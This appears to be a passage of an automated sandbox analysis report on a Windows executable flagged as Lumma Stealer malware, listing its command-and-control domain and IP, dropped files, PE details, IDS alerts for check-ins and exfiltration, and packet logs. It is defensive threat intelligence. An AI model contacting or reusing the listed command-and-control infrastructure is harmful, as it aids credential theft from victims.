https://github.com/aws/jsii/issues	file.exe, program.js.0.dr	false		unknown
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2	file.exe, 00000000.00000002.2423108104.000000000241E000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://seallysl.site/apiture	BitLockerToGo.exe, 00000002.00000003.2470478050.00000000052C0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.opengis.net/kml/2.2	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.opengis.net/gml/3.3/exr	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://seallysl.site/8	BitLockerToGo.exe, 00000002.00000003.2557453027.0000000003012000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.180.76	seallysl.site	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544781
Start date and time:	2024-10-29 18:38:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 93% Number of executed functions: 30 Number of non-executed functions: 100
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 3796 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:39:32	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.180.76	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse
172.67.180.76	http://whatsmyname.app/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
seallysl.site	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	172.67.180.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	162.159.140.237
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse	104.18.24.210
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.21.33.160
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	INVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	buNtKcYHCa.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	172.67.180.76

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\bin\jsii-runtime.js

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	C++ source, ASCII text, with very long lines (324), with escape sequences
Category:	dropped
Size (bytes):	138639
Entropy (8bit):	4.286369825068587
Encrypted:	false
SSDEEP:	1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
MD5:	A7C8367F8B900617374F5D3FAC86DFD7
SHA1:	6BDEAB34FA632083B2578708EB0C50443ED5E9A9
SHA-256:	E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
SHA-512:	2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\bin\jsii-runtime.js.map

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	218125
Entropy (8bit):	5.457704584855637
Encrypted:	false
SSDEEP:	3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
MD5:	0FEFBA04D8BBEDD2CFF7EB75C3834847
SHA1:	054D11200D77C1B5DFB3B98A33973623619D34BE
SHA-256:	DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
SHA-512:	3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\lib\program.js

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (489)
Category:	dropped
Size (bytes):	802466
Entropy (8bit):	4.298722687837962
Encrypted:	false
SSDEEP:	6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
MD5:	4C6E1287B2F6060C1E0F386B0B47959A
SHA1:	0FA0C721B6848D78C73FCF74BB37891A17FF0999
SHA-256:	C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
SHA-512:	0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\lib\program.js.map

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1155588
Entropy (8bit):	5.4159552687244155
Encrypted:	false
SSDEEP:	12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
MD5:	BE06DF1EE810220598CAE6D42AE2FD77
SHA1:	5DD0B0F101FDE69B49E37947380431D75D26125C
SHA-256:	09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
SHA-512:	BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.561473820242713
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	11'810'304 bytes
MD5:	3a408188540d593a618c37ff3b9fa378
SHA1:	7298ef70541efda3185b81dbfada7f8c1998e75c
SHA256:	883170fb01d121dd32d3de0c16f987429da0cf1d137e3ce6a92fef44947ae53a
SHA512:	b2399171504df008ca2d3007d33858002c704cb0d892b78ea41e751051f8ccd96b8e887ba5c393daa4124132dce96daf631808d96e70b4a799b282f9133d477a
SSDEEP:	98304:YTMOT3y46FsiZLgYkQlCOzOwEzN0Rpwro:w6JZLgpQlCsOjNP
TLSH:	14C64910FA9B80F1EA031574059F613F6334AE065B25CB8BFA4C7619EF77AA119B3319
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................@.......................@.......................................@................................

File Icon


Icon Hash:	1f79fdca83b33c07

Static PE Info

General

Entrypoint:	0x4718f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4f2f006e2ecf7172ad368f8289dc96c1

Entrypoint Preview

Instruction
jmp 00007FA35CCADE90h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007FA35CC920A6h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007FA35CCB02E4h
cld
call 00007FA35CCAF37Eh
call 00007FA35CCADFB9h
add esp, 08h
ret
jmp 00007FA35CCB0190h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007FA35CCB0191h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb51000	0x45e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8c000	0x47ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb52000	0x3838c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xade380	0xb8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x40b538	0x40b600	1db3fc2794a83b012037aedea60e6b39	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x40d000	0x6cf3f4	0x6cf400	17751cbe0c750a16b7e54c94f3a88198	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xadd000	0x73a80	0x2b400	aec3db175d3e2b931f80d2af0ab86783	False	0.45290485007225434	DIY-Thermocam raw data (Lepton 2.x), scale 27648-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2596148429267413814265248164610048.000000, slope 9935254617047926215029030912.000000	5.071325522452468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb51000	0x45e	0x600	1db4c2feaaa3b494ba5fb1497f61e9a9	False	0.36328125	data	3.92186235756886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xb52000	0x3838c	0x38400	2898572c2c1f4085d0b1b450eae343dc	False	0.5786328125	data	6.69133644924609	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xb8b000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xb8c000	0x47ac	0x4800	bfcba23d39c064abbe64d4c3409ea8cf	False	0.4374457465277778	data	5.138255046175104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xb8c1a4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.4387966804979253
RT_ICON	0xb8e74c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.49437148217636023
RT_ICON	0xb8f7f4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.601063829787234
RT_GROUP_ICON	0xb8fc5c	0x30	data	English	United States	0.8541666666666666
RT_VERSION	0xb8fc8c	0x4f4	data	English	United States	0.29258675078864355
RT_MANIFEST	0xb90180	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T18:39:32.417887+0100	2057095	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)	1	192.168.2.6	52252	1.1.1.1	53	UDP
2024-10-29T18:39:32.467113+0100	2057093	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)	1	192.168.2.6	53467	1.1.1.1	53	UDP
2024-10-29T18:39:33.187259+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49824	172.67.180.76	443	TCP
2024-10-29T18:39:33.609183+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49824	172.67.180.76	443	TCP
2024-10-29T18:39:33.609183+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49824	172.67.180.76	443	TCP
2024-10-29T18:39:34.339454+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49834	172.67.180.76	443	TCP
2024-10-29T18:39:34.828400+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49834	172.67.180.76	443	TCP
2024-10-29T18:39:34.828400+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49834	172.67.180.76	443	TCP
2024-10-29T18:39:35.901236+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49841	172.67.180.76	443	TCP
2024-10-29T18:39:37.390281+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49841	172.67.180.76	443	TCP
2024-10-29T18:39:38.145429+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49851	172.67.180.76	443	TCP
2024-10-29T18:39:39.556612+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49862	172.67.180.76	443	TCP
2024-10-29T18:39:41.296508+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49873	172.67.180.76	443	TCP
2024-10-29T18:39:44.119673+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49884	172.67.180.76	443	TCP
2024-10-29T18:39:46.765924+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.6	49905	172.67.180.76	443	TCP
2024-10-29T18:39:47.096041+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49905	172.67.180.76	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 18:39:32.516316891 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:32.516354084 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:32.516469955 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:32.520725012 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:32.520756006 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.187169075 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.187258959 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.189606905 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.189630032 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.190068960 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.231806993 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.276813984 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.276846886 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.277061939 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.609287977 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.609560966 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.609687090 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.611339092 CET	49824	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.611358881 CET	443	49824	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.673415899 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.673456907 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:33.673556089 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.673854113 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:33.673866034 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.339273930 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.339453936 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.340915918 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.340931892 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.341253042 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.342417955 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.342442989 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.342504025 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828495979 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828638077 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828735113 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828735113 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.828773975 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828847885 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.828855991 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.828965902 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.829018116 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.829022884 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.829129934 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.829183102 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:34.829189062 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.872509003 CET	49834	443	192.168.2.6	172.67.180.76
